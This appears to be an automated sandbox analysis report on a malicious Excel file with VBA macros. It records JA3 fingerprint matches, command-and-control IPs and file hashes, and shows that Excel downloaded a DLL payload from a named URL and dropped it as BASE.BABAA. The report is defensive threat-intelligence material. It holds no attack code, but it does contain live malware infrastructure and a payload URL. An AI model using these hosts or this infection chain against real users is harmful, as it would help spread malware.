 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.1476.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.1181.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.21235.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.15875.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.21759.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.2804.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.1138.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.11266.xls | malicious | 185.81.0.78
 | SecuriteInfo.com.Heur.18554.xls | malicious | 185.81.0.78
 | Sign-636.xls | malicious | 185.81.0.78
 | Sign-92793351_1597657581.xls | malicious | 185.81.0.78

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
8c4a22651d328568ec66382a84fc505f | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.1476.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.15875.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.21759.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.2804.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.1138.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.11266.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.18554.xls | malicious | 142.202.191.164
 | Sign-636.xls | malicious | 142.202.191.164
 | Sign-92793351_1597657581.xls | malicious | 142.202.191.164
 | Sign-979329054_1327186231.xls | malicious | 142.202.191.164
 | Sign-707465831_1420670581.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.22173.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.11712.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.28224.xls | malicious | 142.202.191.164
 | SecuriteInfo.com.Heur.13393.xls | malicious | 142.202.191.164
 | Sign_1136845514-2138034493.xls | malicious | 142.202.191.164

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious
 | SecuriteInfo.com.Heur.1476.xls | malicious
 | SecuriteInfo.com.Heur.1181.xls | malicious
 | SecuriteInfo.com.Heur.21235.xls | malicious
 | SecuriteInfo.com.Heur.15875.xls | malicious
 | SecuriteInfo.com.Heur.21759.xls | malicious
 | SecuriteInfo.com.Heur.2804.xls | malicious
 | SecuriteInfo.com.Heur.1138.xls | malicious
 | SecuriteInfo.com.Heur.11266.xls | malicious
 | SecuriteInfo.com.Heur.18554.xls | malicious
 | Sign-636.xls | malicious
 | Sign-92793351_1597657581.xls | malicious
 | Sign-979329054_1327186231.xls | malicious
C:\Users\user\BASE.BABAA | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious
 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious
 | SecuriteInfo.com.Heur.1476.xls | malicious
 | SecuriteInfo.com.Heur.1181.xls | malicious
 | SecuriteInfo.com.Heur.21235.xls | malicious
 | SecuriteInfo.com.Heur.15875.xls | malicious
 | SecuriteInfo.com.Heur.21759.xls | malicious
 | SecuriteInfo.com.Heur.2804.xls | malicious
 | SecuriteInfo.com.Heur.1138.xls | malicious
 | SecuriteInfo.com.Heur.11266.xls | malicious
 | SecuriteInfo.com.Heur.18554.xls | malicious
 | Sign-636.xls | malicious
 | Sign-92793351_1597657581.xls | malicious
 | Sign-979329054_1327186231.xls | malicious

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\wermgr.exe
File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
Category: dropped
Size (bytes): 59134
Entropy (8bit): 7.995450161616763
Encrypted: true
SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5: E92176B0889CC1BB97114BEB2F3C1728
SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\wermgr.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.078657124509345
Encrypted: false
SSDEEP: 6:kK7APbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:DAW3kPlE99SNxAhUeo+aKt
MD5: 76C4F94E3F31035415F533015971BE6E
SHA1: C7A8552A39CA176E310DCAFCF2D198808FCE970D
SHA-256: 2341CC65476F6D7FAEA43753B543EFF7DDC8CEB07F2DA3D8C33D695B24D8688C
SHA-512: 066B27D84C6FD5A717D377649DCE5534749D1F15DA2E4A73B9D5B0715029A7E8B64ADE266D2369D7C5DA9B62986B90BD2856A2A85AEFE3093931972FE5645883
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 4591104
Entropy (8bit): 5.0540147937501265
Encrypted: false
SSDEEP: 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5: 25056DF6D3546DE971EAFE5DA5F9AE44
SHA1: 179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256: AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512: 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 11%
• Antivirus: ReversingLabs, Detection: 6%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\CBBE0000
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):155530
                                                                                                                                                                                            Entropy (8bit):7.660500020953335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXa:YEGSzx0dmxk7RbsYsKtseoXq
                                                                                                                                                                                            MD5:2C9F8E47B1600F5DE2F6DCDFB24094CC
                                                                                                                                                                                            SHA1:D4BE003987DD33946B0636CFA3CA7F22095B65B5
                                                                                                                                                                                            SHA-256:A8EAB1FB3FE63C24CD13039896ADA32D0463BB1D31ECEDC59C02E661EB4054CF
                                                                                                                                                                                            SHA-512:4256D5E72B27028E98B2E896211A25D2DD3102E4625DEA37AFB2FF7E4117025952B26AA399E9673B9EF0C782376001E9E894A0B4A4B88775945F5D35F65B201D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Cab20E9.tmp
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):59134
                                                                                                                                                                                            Entropy (8bit):7.995450161616763
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tar20EA.tmp
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):152788
                                                                                                                                                                                            Entropy (8bit):6.316654432555028
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 10:16:34 2021, atime=Sat Feb 20 10:16:34 2021, length=16384, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):867
                                                                                                                                                                                            Entropy (8bit):4.495155303444507
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:85Q+pgLgXg/XAlCPCHaXSzB8aB/OxJX+WnicvbLbDtZ3YilMMEpxRljKrcCTdJP8:85jk/XTK6aEJYe7Dv3qSnrNru/
                                                                                                                                                                                            MD5:6AD8E80E987BF8C934BD3809D8B2B24A
                                                                                                                                                                                            SHA1:6E7E22616035724B1F851AFD0DB24BF745C1A49D
                                                                                                                                                                                            SHA-256:A48DD1DA24A3FFD1E5FF10E8314D8FB031D4741E37E22FD8297E4F440144FE54
                                                                                                                                                                                            SHA-512:F8BD2A5C8116945136D106753122AABC98EF29877E246A2CDC4FECDE777DEDEC2AF167DB6FF6BB86C53ACD56359B29AAFDF95851D1DCC39C612C2F94AA31F976
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: L..................F...........7G...*..y....*..y....@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Z..Desktop.d......QK.XTR.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 10:16:21 2021, mtime=Sat Feb 20 10:16:34 2021, atime=Sat Feb 20 10:16:34 2021, length=168448, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2368
                                                                                                                                                                                            Entropy (8bit):4.581927649821565
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8BN/XTZaiHCqQFHCCWQh2BN/XTZaiHCqQFHCCWQ/:8BN/X1aiiyCWQh2BN/X1aiiyCWQ/
                                                                                                                                                                                            MD5:6463D8D40C4CE9238290D3D9B27C30F2
                                                                                                                                                                                            SHA1:5DB759C84513B007B87571B18FAEC5140DA23B9C
                                                                                                                                                                                            SHA-256:16E680D0309BC36471D6668FC9142E40093A5879F6EDD687A1F3AB88B07D4412
                                                                                                                                                                                            SHA-512:8B5622C40D905FE466777FCD5A61C9F3BBD8C563A969DE585EFC0B41BD00260C7FD8A340E47AB7A754CFFF8010129379DCB1D15611F29C444E179E9812329D7D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: L..................F.... .....i.y....*..y....N..y................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Z..Desktop.d......QK.XTR.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.Z .SECURI~1.XLS.........TR.ZTR.Z*..."&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.3.1.2.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.3.1.2.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):185
Entropy (8bit):4.864166697857585
Encrypted:false
SSDEEP:3:oyBVomM0bcsoMW3k2uscbcsoMW3k2mM0bcsoMW3k2v:dj60wsoMW0nwsoMW0o0wsoMW0I
MD5:C69269D3656A2431308C88DEF4D4F13F
SHA1:F674A7D59F59141335B18F2B639B47DBCE39B7A9
SHA-256:EE99BFC929243FB6DE7456053F6298AF672490869E31DB431EBC927E07483DD2
SHA-512:15C6248901F8FDF3DFD060938B7E70AD372878E99DB616F33129A788004190E3F6AA10D7CF5810F57798A09980A61017191F1606D304B719826EE4A6741AAA63
Malicious:false
Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..
C:\Users\user\BASE.BABAA
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4591104
Entropy (8bit):5.0540147937501265
Encrypted:false
SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5:25056DF6D3546DE971EAFE5DA5F9AE44
SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 11%
• Antivirus: ReversingLabs, Detection: 6%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
• Filename: Sign-92793351_1597657581.xls, Detection: malicious
• Filename: Sign-979329054_1327186231.xls, Detection: malicious
C:\Users\user\Desktop\AEBE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Applesoft BASIC program data, first line number 16
Category:dropped
Size (bytes):177025
Entropy (8bit):7.2399467144037395
Encrypted:false
SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnM:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKI
MD5:E48CD2A56FE62C58737B52EADBA85D78
SHA1:B43686D2ADBFBE3F46F740B3EE2E5B9C64634041
SHA-256:3152805E9D9C73AD3F4697857DD09D126EFDC3BF9B81C57C2BC385F741495172
SHA-512:449E2593CDAD3C634F41E0FD35465EF74FD7B2FB2BC5885CDEC7CDA6929E2DEE0FCF43610DB04515B4EC8416D8142CCEA693ED5731971991CEE2CF62D01FF77B
Malicious:false

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
Entropy (8bit):7.195176543915214
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls
File size:168960
MD5:31964397103260697c37ee4237194da9
SHA1:7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94
SHA256:12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4
SHA512:0440996111d6eada8a6f1389d0658adcc291b2d1000b5f47c83cc3c03673f4e4cc89ff9d21a3b7ad02b13e208241ff0432286201f254d15b1167fdbbf074c352
SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMD:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKe

File Icon

Icon Hash:e4eea286a4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls"

Indicators

Has Summary Info:True
Application Name:Microsoft Excel
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1251
Author:
Last Saved By:
Create Time:2006-09-16 00:00:00
Last Saved Time:2021-02-19 10:48:36
Creating Application:Microsoft Excel
Security:0

Document Summary

Document Code Page:1251
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:917504

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.357299206868
Base64 Encoded:False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:4096
Entropy:0.247217286775
Base64 Encoded:False
